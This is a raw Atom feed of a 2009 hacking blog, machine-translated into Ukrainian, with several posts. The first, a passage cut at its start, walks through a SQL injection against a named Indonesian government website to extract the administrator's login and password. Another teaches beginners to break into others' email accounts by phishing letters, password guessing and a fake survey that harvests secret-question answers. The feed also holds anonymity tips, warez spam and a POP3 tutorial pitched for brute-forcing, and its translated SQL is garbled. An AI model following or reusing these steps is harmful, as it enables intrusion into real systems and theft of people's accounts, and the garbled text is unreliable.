/&gt;http://www.komnasfbpi.go.id/berita_eng.php?id=58 + + тем по 14 / *&lt;br /&gt;Уряяя! 14 Сторінка завантажилася нормально, а 15-ая завантажувався з помилкою, це означає що полів всього лише 14, це нам тільки наруку.Теперь знаючи що полів 14, подивимося яке з них прінтабельное, то є з допомогою якого поле виводитися інформація.Для цього нам потрібно скористатися оператором&lt;br /&gt;"Союз + вибрати", складаємо запит, делаеться це так:&lt;br /&gt;http://www.komnasfbpi.go.id/berita_eng.php?id=58 + + союз виберіть +1,2,3,4,5,6,7,8,9,10,11,12,13, 14 / *&lt;br /&gt;&lt;br /&gt;Дивимося на результат, коли сторінка завантажується, прокручують сторінку до самого низу, і ми побачимо що&lt;br /&gt;&lt;br /&gt;там отоброжаеться цифра 9, це означає, що для виведення інформації використовується 9-е поле.&lt;br /&gt;Ну ось тепер коли ми знаємо, що в базі тільки 14 полів і використовуються 9-е прінтабельное, переходимо до&lt;br /&gt;&lt;br /&gt;наступного етапу, будемо долбить базу даних і спробувати витягти звідти логіп і пас Админа.)) Нам щас&lt;br /&gt;&lt;br /&gt;потрібно перевірити, чи існує в базі даних таблицю з назвою типу користувачів, користувач, адміністратор І т.д. .. Це&lt;br /&gt;&lt;br /&gt;теж делаеться з оператором союз + select.Нам щас потрібен логін і пас адміна, давайте почнемо з&lt;br /&gt;&lt;br /&gt;логіна.Для того, щоб дізнатися логін, нам треба перевірити, чи існує в базі даних таблиця з назвою&lt;br /&gt;&lt;br /&gt;ім'я, або логін, де і зберігатися логін.Теперь ми і будемо перевіряти на наявність всіх цих табліц.Делаем&lt;br /&gt;&lt;br /&gt;це як я вже казав оператором союз + вибрати таким чином:&lt;br /&gt;&lt;br /&gt;http://www.komnasfbpi.go.id/berita_eng.php?id=58 + + союз виберіть +1,2,3,4,5,6,7,8,9,10,11,12,13, 14 + від +&lt;br /&gt;&lt;br /&gt;Користувачі / *&lt;br /&gt;&lt;br /&gt;Цим ми перевіряємо, чи існує таблиця користувачів у базі даних, якщо така існує, то сторінка&lt;br /&gt;&lt;br /&gt;завантажитися без помилки, а якщо такої немає, то завантажитися з ошібкой.Нам на це видалася помилка, значет&lt;br /&gt;&lt;br /&gt;такий нет.Проверім чи є таблиця користувачів:&lt;br /&gt;&lt;br /&gt;http://www.komnasfbpi.go.id/berita_eng.php?id=58 + + союз виберіть +1,2,3,4,5,6,7,8,9,10,11,12,13, 14 + користувачів /&lt;br /&gt;&lt;br /&gt;*&lt;br /&gt;&lt;br /&gt;на жаль і такий не виявилося, теж нам на це видалася помилка ...(( Але не треба&lt;br /&gt;&lt;br /&gt;засмучуватися! Багато админы використовують префікси перед назвою табліци.Теперь зверніть увагу на&lt;br /&gt;&lt;br /&gt;ту помилку яка нам виводитися:&lt;br /&gt;&lt;br /&gt;Відкрита база даних: Невірний запит&lt;br /&gt;SELECT * FROM tbl_berita де berita_id = 57 '&lt;br /&gt;&lt;br /&gt;Подивіться там на цей текст: tbl_berita&lt;br /&gt;Тут використовується префікс tbl_ перед назвою табліци.Давайте перевіримо чи існує таблиця користувачів&lt;br /&gt;&lt;br /&gt;використовуючи цей префікс! Ок, робимо запит:&lt;br /&gt;&lt;br /&gt;http://www.komnasfbpi.go.id/berita_eng.php?id=58 + + союз виберіть +1,2,3,4,5,6,7,8,9,10,11,12,13, 14 + tbl_u&lt;br /&gt;&lt;br /&gt;сер / *&lt;br /&gt;&lt;br /&gt;Є! Ура! Сторінка завантажилася нормально, значить таблиця tbl_user існує! Тепер спробуємо дістати&lt;br /&gt;&lt;br /&gt;ім'я користувача з таблиці tbl_user.Проверім, чи існує запис з назвою ім'я в таблиці&lt;br /&gt;&lt;br /&gt;tbl_user.Ето делаесть майже також, тільки в 9-е поле вставляємо слово назву, цим ми і будемо перевіряти&lt;br /&gt;&lt;br /&gt;чи існує запис в таблиці ім'я tbl_user.Етот запит буде виглядати так:&lt;br /&gt;&lt;br /&gt;http://www.komnasfbpi.go.id/berita_eng.php?id=58 + + союз виберіть +1,2,3,4,5,6,7,8, ім'я, 10,11,12,13, 14 + ТБ&lt;br /&gt;&lt;br /&gt;l_user / *&lt;br /&gt;&lt;br /&gt;Подивимося що ми на це вийде, а нам на це сторінка завантажилася нормально, значить є&lt;br /&gt;&lt;br /&gt;такая! прокручують сторінку в самий низ, і бачимо там запис "Адміністратор", Ураа!! У нас тепер є&lt;br /&gt;&lt;br /&gt;логін адміна, залишилося дістати пасс.Пробуем:&lt;br /&gt;&lt;br /&gt;http://www.komnasfbpi.go.id/berita_eng.php?id=58 + + союз виберіть +1,2,3,4,5,6,7,8, пароль, 10,11,12,13, 1&lt;br /&gt;&lt;br /&gt;4 + tbl_user / *&lt;br /&gt;&lt;br /&gt;На це нам сторінка завантажилася з помилкою, це означає, що немає запису паролів, пробум так:&lt;br /&gt;&lt;br /&gt;http://www.komnasfbpi.go.id/berita_eng.php?id=58 + + союз виберіть +1,2,3,4,5,6,7,8, пароль, 10,11,12,13, 14 +&lt;br /&gt;&lt;br /&gt;tbl_user / *&lt;br /&gt;&lt;br /&gt;На це теж видалася помилка,, такої теж нема ((пробуємо далі:&lt;br /&gt;&lt;br /&gt;http://www.komnasfbpi.go.id/berita_eng.php?id=58 + + союз виберіть +1,2,3,4,5,6,7,8, пароль, 10,11,12,13, 14 + tbl&lt;br /&gt;&lt;br /&gt;_USER / *&lt;br /&gt;&lt;br /&gt;Даа! Сторінка завантажилася без помилки, і це значить що запис! Прокручують сторінку в самий низ і&lt;br /&gt;&lt;br /&gt;там ми бачимо пас адміна! Залишилося його розшифрувати і все!&lt;br /&gt;Потім переходимо сюди http://www.komnasfbpi.go.id/admin вводимо отримані дані, і все, далі все&lt;br /&gt;&lt;br /&gt;залежить від вашої фантазії!&lt;br /&gt;Ось і все, все, про що б я з вами хотів би поделіться.Я описав просенькую SQL ін'єкцію.&lt;br /&gt;&lt;br /&gt;УВАГА! Автор не несе ніякої відповідальності за неправильне використання розміщеної тут&lt;br /&gt;&lt;br /&gt;інформації! Усе, що тут розміщено, це не пробудження до дії, а лише для ознайомлювальних&lt;br /&gt;&lt;br /&gt;цілей!&lt;br /&gt;Ну ось і все, всім пока и удачи зі зломом!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3396992018587873090-603623840147905054?l=hackerzonn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerzonn.blogspot.com/feeds/603623840147905054/comments/default' title='Дописати коментарі'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=3396992018587873090&amp;postID=603623840147905054' title='0 коментарі(в)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/603623840147905054'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/603623840147905054'/><link rel='alternate' type='text/html' href='http://hackerzonn.blogspot.com/2009/02/sql.html' title='Чергова SQL ін&apos;єкцій.'/><author><name>en team</name><uri>http://www.blogger.com/profile/06206779249624408587</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3396992018587873090.post-1583372920288027512</id><published>2009-02-04T02:11:00.002-08:00</published><updated>2009-02-04T02:12:21.322-08:00</updated><title type='text'>Російські хакери покарали Киргизії за американську військову базу</title><content type='html'>За твердженням американського експерта з комп'ютерної безпеки Дона Джексона з фірми SecureWorks Inc, розташованої в Атланті, російські хакери "вирубати" Киргизії з мережі. З 18 січня цієї далекої середньоазіатських країн постійно перекривають доступ до Інтернету.&lt;br /&gt;&lt;br /&gt;Популярний метод сучасних хакерів - відмова в обслуговуванні напад - настільки перезавантажувати сервери, що вони йдуть в автономному режимі. Кібератакам піддалися два основних киргизьки інтернет-провайдера, частка яких на ринку інтернет-послуг перевищує 80%.&lt;br /&gt;&lt;br /&gt;Чому ж американського експерта хвилює ситуація в далекій від США країні, де лише 20% населення має у своєму розпорядженні доступом в Інтернет? Виявляється, він переживає за рівень підготовленості самої Америки до таких атак.&lt;br /&gt;&lt;br /&gt;Можна позаздрити рівнем патріотизму Джексона, якби не одна обставина. За однією з версій, причиною атаки проти киргизького інтернету вважають протест російських хакерів-патріотів проти присутності на території колишньої радянської республіки американської військової бази. І хоча російське посольство в Киргизії ситуацію не коментує, вспомнилось до місця рядок з вірша А.С Пушкіна: "Як нині сбірается вещій Олег помститися над нерозумним хазарам ...". Виходить, що відімститься.&lt;br /&gt;&lt;br /&gt;http://www.internovosti.ru&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3396992018587873090-1583372920288027512?l=hackerzonn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerzonn.blogspot.com/feeds/1583372920288027512/comments/default' title='Дописати коментарі'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=3396992018587873090&amp;postID=1583372920288027512' title='0 коментарі(в)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/1583372920288027512'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/1583372920288027512'/><link rel='alternate' type='text/html' href='http://hackerzonn.blogspot.com/2009/02/blog-post_6653.html' title='Російські хакери покарали Киргизії за американську військову базу'/><author><name>en team</name><uri>http://www.blogger.com/profile/06206779249624408587</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3396992018587873090.post-5254861744563493603</id><published>2009-02-04T02:11:00.001-08:00</published><updated>2009-02-04T02:11:36.575-08:00</updated><title type='text'>Велике злиття на світовому ринку аутентифікації</title><content type='html'>Компанія Aladdin Знання систем ТОВ (NASDAQ: ALDN), провідний розробник систем аутентифікації, продуктів і рішень для забезпечення інформаційної безпеки, оголосила про згоду увійти до складу високотехнологічного холдингу під управлінням найбільшої групи інвесторів Вектор Капітал ".&lt;br /&gt;Днями інвестиційний холдинг Вектор Капітал досяг угоди з радою акціонерів компанії Aladdin Знання систем (АКС) про її злиття з компанією SafeNet, власником якої також є згаданий холдинг. До вже наявних у Вектор Капітал 14% акцій Aladdin, в результаті нової угоди було додано ще 19% на загальну суму близько 160 млн.. доларів. За оцінками експертів, дана угода здатна істотно змінити розстановку сил на ринку апаратної аутентифікації та захисту програмного забезпечення (ПЗ).&lt;br /&gt;Угода з АKS стало логічним продовженням політики Вектор Капітал, яка за останні роки об'єднала таких відомих виробників, як WinZip, WatchGuard Technologies, SafeNet, Corel Корпорація LANDesk Software, Savi техніка, точний програмних рішень, Printronix, Register.com, Tripos та ін Будучи керуючим партнером, Вектор Капітал розробляє і впроваджує ефективні фінансові і бізнес-стратегії, здатні якісно поліпшити конкурентоспроможність що входять в холдинг компаній і збільшити їх ринкову вартість. Придбання акцій АКС забезпечує Вектор Капітал можливість зміцнити свої позиції на ринку аутентифікації, розширити лінійку пропонованих продуктів, а також отримати вихід на нові географічні ринки. При цьому в угоді з АКС особливий акцент зроблено на те, що всі торгові марки вендора, серед яких HASP, eToken, eSafe будуть повністю збережені як самостійні сформувалися бренди, що стали стандартами «де-факто» на профільних ринках. «Інтеграція АКС з такими гравцями ринку, як SafeNet і WatchGuard повністю узгоджується з нашою стратегією глобалізації», - сказав Шломо Янай (Shlomy Янаі), віце-президент "Системи знань Aladdin за напрямом eToken. «Важливою перевагою операції для нас також є можливість м'якого виходу на ринки США, Канади та Південної Америки» - додав він.&lt;br /&gt;&lt;br /&gt;Злиттям АКС і SafeNet в структурному і стратегічному плані не внесе істотних змін в роботу російського дистриб'ютора АКС - компанії «Aладдін». Основні нововведення можуть торкнутися продуктової пропозиції, для розвитку і супроводу якого російський дистрибутор нарощував свій кадровий і технологічний потенціал у кінці 2008 року. Зберігаючи максимальну незалежність від вендора з погляду ведення бізнесу, «Aладдін» в результаті операції очікує появи інноваційних продуктових пропозицій, пов'язаних з припливом інвестицій в дослідну діяльність та інтеграцією з передовими технологіями SafeNet і WatchGuard.&lt;br /&gt;&lt;br /&gt;Протягом трьох місяців угода між АКС та Вектор Капітал повинна бути підтверджена радою акціонерів компанії АКС. У випадку, якщо буде прийнято позитивне рішення, інформація про угоду направляється в антимонопольні органи, які розглянуть її законність.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3396992018587873090-5254861744563493603?l=hackerzonn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerzonn.blogspot.com/feeds/5254861744563493603/comments/default' title='Дописати коментарі'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=3396992018587873090&amp;postID=5254861744563493603' title='0 коментарі(в)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/5254861744563493603'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/5254861744563493603'/><link rel='alternate' type='text/html' href='http://hackerzonn.blogspot.com/2009/02/blog-post_04.html' title='Велике злиття на світовому ринку аутентифікації'/><author><name>en team</name><uri>http://www.blogger.com/profile/06206779249624408587</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3396992018587873090.post-1993996734406544064</id><published>2009-02-03T04:34:00.000-08:00</published><updated>2009-02-03T04:56:25.689-08:00</updated><title type='text'>Сайт для риболовів та мисливців .</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.rybalka.com/images/logo.gif"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 127px; height: 112px;" src="http://www.rybalka.com/images/logo.gif" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;Сайт для риболовів та мисливців .&lt;br /&gt;Тут можна знайти все, це дуже корисний сайт .&lt;br /&gt;Тут навіть можна створити свою власну сторінку, чи замовити різні снасті для риболовлі чи полювання . Закачати GPS карти і просто карти .Замовити топові журнали по риболовстві і тд...&lt;br /&gt;Мені як веб мастеру сподобався сайт своїм оформленням...&lt;br /&gt;Як я завжди казав що саме головне це зручність і багато функціональність .&lt;br /&gt;Сайт як в основном зроблений на 5-ть. &lt;br /&gt;-"Мабуть не мало за нього виложили"&lt;br /&gt;По більше-б таких сайтів.&lt;br /&gt;Я пораджу всім хто хоч раз був на полюванні чи риболовлі зайти на цей сайт на ньом можна знайти багато чого цікавого !!!&lt;br /&gt;&lt;a href='http://www.rybalka.com/'&gt;блоги рыболовов,&lt;/a&gt;&lt;br /&gt;&lt;a href='http://www.rybalka.com/'&gt;охота в Украине&lt;/a&gt;&lt;br /&gt;&lt;a href='http://www.rybalka.com/'&gt;рыбалка в Украине,&lt;/a&gt;&lt;br /&gt;&lt;a href='http://www.rybalka.com/'&gt;форум рыболовов,&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3396992018587873090-1993996734406544064?l=hackerzonn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerzonn.blogspot.com/feeds/1993996734406544064/comments/default' title='Дописати коментарі'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=3396992018587873090&amp;postID=1993996734406544064' title='0 коментарі(в)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/1993996734406544064'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/1993996734406544064'/><link rel='alternate' type='text/html' href='http://hackerzonn.blogspot.com/2009/02/blog-post_03.html' title='Сайт для риболовів та мисливців .'/><author><name>en team</name><uri>http://www.blogger.com/profile/06206779249624408587</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3396992018587873090.post-530494026900181793</id><published>2009-02-02T00:37:00.001-08:00</published><updated>2009-02-03T05:10:53.048-08:00</updated><title type='text'>Як приховати свій IP ? (для новачків)</title><content type='html'>На форумі часто запитують: «як приховати свій IP?» І їм відповідають: «Ісползовать анонімні проксі!» А як їх використовувати? А ось так: Спочатку потрібно ці проксі де-небудь найдті, потім налаштувати свій браузер на роботу з проксі. Де найдті проксі? та де завгодно! Просто введи в поисковике «Проксі + лист». Або зайди сюди:&lt;br /&gt;http://www.samair.ru/proxy/&lt;br /&gt;Далі налаштовувати браузер: заходиш в СЕРВІС / СВ-ВА ОБОЗРЕВАТЕЛЬ / ПІДКЛЮЧЕННЯ / НАСТРОЙКА і там Відзначивши галочкою ВИКОРИСТОВУВАТИ проксі-сервера (при цьому перевір, щоб використовувати автоматичне ВИЗНАЧЕННЯ налаштувань), далі в полі IP пиши IP сервера, і порт відповідно. Після цього жми ОК і можеш юзать проксі! Тепер перед тим, як з'єднатися з потрібним тобі вузлом твій браузер спочатку з'єднатися з проксі-сервером а потім відправить вже через проксі запит на потрібний тобі ресурс. Інша справа - це вибрати хорошой, швидкий, і анонімний проксі. Для тренування попробуй 195.68.95.209 порт 8080. Досить швидкий і Анонімний-преанонімний.&lt;br /&gt;&lt;br /&gt;АЛЕ! Твій IP можна витягнути і через пошту. Щоб приховати IP у листі, так само використовуй проксі, але можна ще й:&lt;br /&gt;&lt;br /&gt;1. Відправити анонімно пошту, використовуючи призначені для цього ресурси, наприклад: http://www.mafiamail.ru:8101/, http://tools-on.net/privacy.shtmll, http://anonymouse-master.org/, http://anonym-mail.host.sk/ ще можна пошукати в Яндексі "відправлення анонімної пошти", "Send anonymous mail" Для більшої анонімності можна ще при цьому скористатися Proxy або анонімайзером&lt;br /&gt;2. Скористатися ремейлером, для цього потрібно надіслати листа на поштову адресу, наприклад remailer@replay.com, вказавши на початку тексту рядок "Anon-To: адреса одержувача". Потім повинна йти один порожній рядок і вже потім текст повідомлення. список ремейлеров на http://www.publius.net/rlist.htm&lt;br /&gt;3. Ще можна налаштувати поштовий клієнт на роботу зі звичайним Proxy-сервером, робиться це за допомогою проги HTTPort.&lt;br /&gt;4. Можна використовувати спеціальні програми для відправки анонімної пошти.&lt;br /&gt;5. Так само можна пошукати "Анонімні SMTP сервери" і скористатися одним з них.&lt;br /&gt;Перед тим як анонімно відправити кому-то лист, перевір чи IP-адреса буде приховано, надіславши листа себе.&lt;br /&gt;Все! Тепер тебе ні хто не знайде.&lt;br /&gt;&lt;a href="http://hackerzonn.blogspot.com/"&gt;Хакерство, книги хакерства, як стать хакером, взлом почтового ящика.&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href='http://www.4erepok.ru/'&gt;&lt;a href="http://www.4erepok.ru/"&gt;crack&lt;/a&gt; для софта&lt;/a&gt;  &lt;a href='http://www.4erepok.ru/'&gt; новый &lt;a href="http://www.4erepok.ru/"&gt;warez&lt;/a&gt;&lt;/a&gt;  &lt;a href='http://www.4erepok.ru/'&gt; скачать &lt;a href="http://www.4erepok.ru/"&gt;warez&lt;/a&gt;&lt;/a&gt;  &lt;a href='http://www.4erepok.ru/'&gt;популярная &lt;a href="http://www.4erepok.ru/"&gt;музыка&lt;/a&gt;&lt;/a&gt;  &lt;a href='http://www.4erepok.ru/'&gt;Свежие &lt;a href="http://www.4erepok.ru/tags/%D4%E8%EB%FC%EC/"&gt;фильмы&lt;/a&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3396992018587873090-530494026900181793?l=hackerzonn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerzonn.blogspot.com/feeds/530494026900181793/comments/default' title='Дописати коментарі'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=3396992018587873090&amp;postID=530494026900181793' title='0 коментарі(в)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/530494026900181793'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/530494026900181793'/><link rel='alternate' type='text/html' href='http://hackerzonn.blogspot.com/2009/02/ip_02.html' title='Як приховати свій IP ? (для новачків)'/><author><name>en team</name><uri>http://www.blogger.com/profile/06206779249624408587</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3396992018587873090.post-8195637564784967113</id><published>2009-02-02T00:35:00.000-08:00</published><updated>2009-02-02T00:36:23.259-08:00</updated><title type='text'>Поради по взлому милов для початківців</title><content type='html'>Вобщем товаріЩЩі ... хочу повідомити вам 3 ... точніше 4 способи злому скриньки яка-нить користувача. Ці способи описані мною тут спеціально для початківців хакерів, які не можуть придумать что нить серйозне і більш дієве, але котирим дуже треба зламати чию-небудь мило ... єдиний мінус цих способів-це те, що вони расщіпани на тупих користувачів (мається на увазі, що тупой юзер той, чий скриньку ви хочете зламати).&lt;br /&gt;Спосіб Нумер Уно: всім вам добре відомий робот, якому потрібно ваш пароль, щоб він видав вам пароль вашої жертви ... просто пишете листа з заголовком ... ну наприклад ... Новий перевірений спосіб злому мильниць (краще мильниць не писати, поскоку той чол може не правильно зрозуміти і ...) так вот ... продовжуємо ... в писмь пишете. всяку фігню типу: "замість теми листа ви повинні ввести ** № # # @ 2136. ваш пароль *? 932!! Е-мийл вашої жертви (:52-2-9! Ваш Е-мейл (на яке прийде пароль жертви),, ... Отримуючи цей лист робот заглючіт і пошле вам пароль від скриньки жертви "ну і так далі ... головне писати з фантазією та заплутаний ... чтоб здавалося що це все правда ... головне написати що цей спосіб працює в різних місцях і для кожного сервак (Яндекс, меіл і т.д.) пишете адресу робота (це має бути ваш скриньку з розумним назвою типу Robotemail (для більшої переконливості ...))&lt;br /&gt;З.Ы. для способу Нумер Уно: нету тут З.Ы.&lt;br /&gt;Спосіб намбер ту: тупой підбір паролів ... для цього необхідно знати 2 речі: 1 що ваша жертва ооочень тупой юзер або просто лінюху (не плутати з твариною що живе в ... в общем где-то живе) ... 2 хоча б мізерні інфу про юзера, щоб приблизно знати що він міг написати ... але і без цих знань можна вгадати пасворд жертви ...&lt;br /&gt;З.Ы. для способу на намбер ту: самі распростроненние паролі це: 1234567890, 987654321, 11111, 1945 Russia, PAROL, пароль, Password, пассворд та номер телефону користувача ...&lt;br /&gt;Споcоб № Драй: для цього способу треба знати про користувача (чий мил' ви хочете зламати) поподробней ... і діє він струму на меіл ру ... по крайне мере в запропонованому мною варіанті ... ви можете просто гадати відповіді на секретне питання ... і угадайте вірний ... когда нибудь ... але легше скористатися наведеної на меіл ру Чудо-анкетою ... хто там бував знає про що я, а хто ні, так ента анкета виводиться при не правильно введеному відповіді на секретне питання ... там ви пишете все, що ви знаєте про користувача і спеціально виготовлений для цього мил' (приготовлений вами) куди і отошьется пароль користувача.&lt;br /&gt;З.Ы. для способу № Драй: нету тут З.Ы.&lt;br /&gt;Спосіб номер чотири: Кодове назва: Опитування Для тупих юзерів (ОДТЮ) вот тут ви можете писати все, що вам в голову взбредет ... головне щоб це був опитування тобто ви складає какую-нить модерних передісторію, мовляв це опитування створено там для чого нитку, та його результати будуть опубліковані там-то і там-то, можна також написати що це опитування проводиться серед обмеженого числа людей емейли яких вибрав какой-нить супер комп, ну всяке в цьому роді ... головне писати убедительно ... і серед питань ОДТЮ повинен бути секретне питання вашої жертви наприклад:&lt;br /&gt;...&lt;br /&gt;14. Ім'я вашої собаки&lt;br /&gt;...&lt;br /&gt;юзер забуває геть які у нього там питання секретні на мило стоять і радіючи можливості взяти участь в опитуванні ... адже ні кожен день такий випадок випадає (:])... і він відповідає на всі питання (включаючи той що його секретний) і посилає відповідь на ваше мило, яке ви вказали в ОДТЮ ... адреса вашого мила теж повинен модерних ... наприклад Opros.... ru от і все ... легко і просто ... головне щоб фантазія була ...&lt;br /&gt;З.Ы. для питання номер чотири: на просунутих користувачів це не діє недарма він називається Опитування Для тупих юзерів ... хоча іноді навіть у досвідчених користувачів зносить башту при такій можливості ... 98% користувачів пишуть відповіддю на таємне запитання правду ...&lt;br /&gt;З.Ы. загальний: не звертайте уваги на граматичні помилки допущені мною ... &lt;br /&gt;&lt;a href="http://hackerzonn.blogspot.com/"&gt;&lt;br /&gt;Хакерство, книги хакерства, як стать хакером, взлом почтового ящика.&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3396992018587873090-8195637564784967113?l=hackerzonn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerzonn.blogspot.com/feeds/8195637564784967113/comments/default' title='Дописати коментарі'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=3396992018587873090&amp;postID=8195637564784967113' title='0 коментарі(в)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/8195637564784967113'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/8195637564784967113'/><link rel='alternate' type='text/html' href='http://hackerzonn.blogspot.com/2009/02/blog-post_8026.html' title='Поради по взлому милов для початківців'/><author><name>en team</name><uri>http://www.blogger.com/profile/06206779249624408587</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3396992018587873090.post-8785003688841982938</id><published>2009-02-02T00:17:00.000-08:00</published><updated>2009-02-02T00:18:48.861-08:00</updated><title type='text'>© Протокол POP3 в Delphi</title><content type='html'>Привіт усім новачкам ХакЗони. У цій статті я збираюся розповісти про протокол POP3 в Delphi-додатках. Як це відноситься до хаку? - Запитаєте ви. Да по-різному. Можливо, кому-то захочеться написати брутфорс, а кому-то свій власний поштовий клієнт, кто-то просто захоче зрозуміти як працювати з POP3 в Delphi, а кто-то хоче видалити всі повідомлення зі свого вконец разбомбленного скриньки ... Взагалі, застосувань куча.&lt;br /&gt;&lt;br /&gt;Отже, почнемо. Користуватися ми будемо компонентом зі сторінки FastNet під назвою TNMPOP3. Як ви вже зрозуміли, цей компонент застосовується для отримання листів від POP3-сервера. Ніяких складностей у поводженні з ним немає, всю роботу Delphi, як зазвичай, виконує за нас. Почнемо.&lt;br /&gt;&lt;br /&gt;Підготовка.&lt;br /&gt;Перед прийомом повідомлень потрібно задати значення властивості Host (ім'я поштового сервера або його IP-адреса), а також значення властивостей UserID і Password (ім'я користувача і пароль). Потім потрібно викликати метод Connect, який встановить з'єднання. При невідповідності UserID / Password відбувається генерація подій:&lt;br /&gt;OnAuthenticationFailed (якщо введено неправильний пароль або невідоме серверу ім'я)&lt;br /&gt;OnAuthenticationNeeded (якщо пароль не вказано або в UserID не вказано ім'я користувача)&lt;br /&gt;&lt;br /&gt;Якщо ви успішно пріконнектілісь до сервера, то автоматично встановлюється властивість MailCount, що показує кількість повідомлень у вашому (або не вашем) скриньці.&lt;br /&gt;&lt;br /&gt;Одержання пошти.&lt;br /&gt;Далі потрібно отримати пошту. Це робиться методом GetMailMessage (N: Integer), де&lt;br /&gt;N - комер повідомлення. Але перед його викликом потрібно встановити властивість DeleteOnRead, що відповідає за видалення прочитаних повідомлень (якщо його значення True, тоді після прочитання листа, повідомлення з сервера видаляється з сервера, якщо FALSE - то немає), а також каталог для вивантаження приєднаних файлів у властивість AttachFilePath ( якщо значення не задано, то файли будуть&lt;br /&gt;розвантажуватися в каталог, з якого виконується програма).&lt;br /&gt;Отже, викликав GetMailMessage. Після цього автоматично встановлюється значення&lt;br /&gt;властивості MailMessage. Воно включає свої власні властивості:&lt;br /&gt;Attachments - імена вкладених файлів&lt;br /&gt;Body - текст листа&lt;br /&gt;From - адреса відправника&lt;br /&gt;Head - заголовок листа&lt;br /&gt;MesageID - унікальний ідентифікатор листа&lt;br /&gt;Subject - тема листа&lt;br /&gt;&lt;br /&gt;Практика.&lt;br /&gt;Вот, в принципе и вся теоритическую частина, тому далі я наведу фрагменти програми. Отже, створюємо форму, кладемо на неї NMPOP3, три TEdit (для сервера, ім'я користувача і пароль) і кнопку для початку&lt;br /&gt;з'єднання, до якої пишемо такий обробник OnClick:&lt;br /&gt;&lt;br /&gt;NMPOP31.Host: = Edit1.Text;&lt;br /&gt;NMPOP31.UserID: = Edit2.Text;&lt;br /&gt;NMPOP31.Password: = Edit3.Text;&lt;br /&gt;NMPOP31.DeleteOnRead: = FALSE;&lt;br /&gt;NMPOP31.Connect;&lt;br /&gt;&lt;br /&gt;Тепер додаємо ще чотири TEdit (для введення номера потрібного листа, для виведення адреси відправника, теми листа і идентификатора листа) і два TMemo (для заголовка і тексту листа). Додамо кнопку, при натисканні якої ми будемо отримувати потрібний лист. До неї пишемо такий обробник:&lt;br /&gt;&lt;br /&gt;VAR&lt;br /&gt;N: Integer;&lt;br /&gt;if NMPOP31.MailCount&gt; 0 Then&lt;br /&gt;BEGIN&lt;br /&gt;N: = StrToIntDef 